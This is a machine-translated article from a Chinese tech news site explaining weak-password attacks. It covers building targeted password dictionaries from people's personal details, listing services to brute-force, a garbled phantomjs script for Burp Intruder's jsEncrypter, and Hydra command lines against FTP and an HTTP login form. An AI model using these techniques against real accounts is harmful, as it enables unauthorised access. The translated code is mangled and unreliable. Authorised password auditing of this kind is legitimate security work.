In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-06 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Internet Technology >
Share
Shulou(Shulou.com)05/31 Report--
Today, the editor will share with you the relevant knowledge points of javascript weak password scanning case analysis. The content is detailed and the logic is clear. I believe most people still know too much about this knowledge, so share this article for your reference. I hope you can get something after reading this article. Let's take a look at it.
1 weak password
Recommend weak password dictionary on github
2 generate weak passwords for social work attributes
The aim is to generate passwords that meet the complexity requirements of passwords and are easy to remember.
2.1 get the account number
How to obtain a user's account:
Chinese common name Top500, common combination:
Full spelling of Pinyin + [number]
Full spelling of surname + initials of first name + [number]
Recruitment website
Social tools (pulse)
Google hacking
Work number
2.2 password fragmentation
Related to users' personal information
Name, nickname, ID, QQ
Birthday, male / girlfriend birthday, special anniversary
Mobile phone number, male / girlfriend mobile phone number
Information about parents and relatives
Company related information (domain name, email address, company phone, department, etc.)
Habit and habit
Keyboard distribution, SHIFT+ keyboard layout
Special holidays, anniversaries, years
A memorable combination of numbers, letters
A memorable combination of special characters
Words with special meanings
Alphanumeric substitution with special meaning (I-5, is-4mai 0)
2.3 combination mode
It is best for the inspected party to provide a list of frequently used default passwords. Here are some other combinations:
There are social worker passwords that can be used to generate combinations of historical records based on previous passwords.
The password usage habits of the department tend to be consistent.
Meaningful characters @ meaningful numbers, such as name spelling @ 2017.
The following picture can be referred to.
2.4 Dictionary Generation tool Bailu Social worker Dictionary Generator
GenpAss
3 weak password related services
All services that may have unauthorized access classes
Remote maintenance services (SSH, Tenlent, RDP, etc.)
Database services (MySQL, MSSQL, Oracle, ES, MongoDB, etc.)
Caching services (Redis, Kafka)
Big data related services
All kinds of interfaces in cloud environment and Docker environment
A variety of Web applications, mobile programs, Mini Program and so on.
4 blasting tools 4.1 Burp Intruder
Use the example
Steps:
Try to log in, use the browser debug mode to find the js file where the encrypted function is located, and usually select the login element in debug mode to search for the information of the function used
Find the final encrypted js file by checking the derivation invocation relationship.
Download the encrypted js file locally
Use jsEncrypter's js template to load encryption functions used
Use phantomjs to load the js template of jsEncrypter
Use Burp's jsEncrypter extension to connect to services enabled by phantomjs
Test the encryption effect
Using the payload processing function of Burp Intruder, the plaintext password is processed by loading jsEncrypter and then burst.
Basic js script
/ * *
* author: c0ny1
* date: 2017-12-16
* last update: 2019-5-30 11:16
, /
Var fs = require ('fs')
Var logfile = 'jsEncrypter.log'
Var webserver = require ('webserver')
Server = webserver.create ()
Var host = '127.0.0.1'
Var port = '1664'
/ / load the js script that implements the encryption algorithm
Var wasSuccessful = phantom.injectJs ('md5.js'); / * introduce js files for encryption * /
/ / processing function
Function js_encrypt (payload) {
Var newpayload
/ * write the code that calls the encryption function to encrypt here * /
Var newpayload = hex_md5 (payload) + "djmis"
/ * /
Return newpayload
}
If (wasSuccessful) {
Console.log ("[*] load js successful")
Console.log ("[!] ^ _ ^")
Console.log ("[*] jsEncrypterJS start!")
Console.log ("[+] address: http://"+host+":"+port);
} else {
Console.log ('[*] load js failure')
}
Var service = server.listen (host+':'+port,function (request, response) {
Try {
If (request.method = = 'POST') {
Var payload = request.post ['payload']
Var encrypt_payload = js_encrypt (payload)
Var log = payload +':'+ encrypt_payload
Console.log ('[+]'+ log)
Fs.write (logfile,log +'\ n', 'wicked')
Response.statusCode = 200
Response.write (encrypt_payload.toString ())
Response.close ()
} else {
Response.statusCode = 200
Response.write ("^ _ ^\ n\ rhello jsEncrypter!")
Response.close ()
}
} catch (e) {
/ / console.log ('[Error]'+ e.messageboxes' happen'+ e.linewise updated linelines')
Console.log ('\ n-Error Info-')
Var fullMessage = "Message:" + e.toString () +':'+ e.line
For (var p in e) {
FullMessage + = "\ n" + p.toUpperCase () + ":" + e [p]
}
Console.log (fullMessage)
Console.log ('-')
Console.log ('[*] phantomJS exitration')
Phantom.exit ()
}
});
Effect.
4.2 Hydra
Use-h to get help and provide several usage examples
Hydra-l admin-p password ftp://localhost/
Hydra-L default_logins.txt-p test ftp://localhost/
Hydra-l admin-P common_passwords.txt ftp://localhost/
Hydra-L logins.txt-P passwords.txt ftp://localhost/
Hydra blasting HTTP request
Hydra-l admin-p password 192.168.43.131 http-post-form "/ login.php:username= ^ user ^ & password= ^ pass ^ & Login=Login:F=Username and/or password incorrect." 4.3 Super weak password checking tool
Graphical interface
These are all the contents of the article "javascript weak password scanning example Analysis". Thank you for reading! I believe you will gain a lot after reading this article. The editor will update different knowledge for you every day. If you want to learn more knowledge, please pay attention to the industry information channel.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.